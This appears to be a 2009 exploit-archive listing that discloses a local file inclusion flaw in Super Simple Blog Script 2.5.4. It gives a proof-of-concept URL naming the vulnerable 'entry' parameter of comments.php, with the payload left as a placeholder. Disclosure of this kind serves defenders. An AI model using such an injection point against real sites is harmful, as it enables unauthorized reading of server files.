[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Super Simple Blog Script 2.5.4 Local File Inclusion Vulnerability
# Published : 2009-07-17
# Author : JiKo
# Previous Title : powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
# Next Title : Super Simple Blog Script 2.5.4 (entry) SQL Injection Vulnerability


----------[exploit Debut]
[ Local File Inclusion Vulnerability]
----------[Script Info]

Moi	: JIKO
Site	: No-exploit.Com
Email	: mm :( Moghla9 Ferme Closed

----------[Script Info]

Site:http	: http://www.supersimple.org/
Download	: http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip

----------[exploit Info]

1]~[LFI]
http://localhost/Path/comments.php?submit=JIKO&entry=[EV!L]
----------[exploit Fin]

# www.Syue.com [2009-07-17]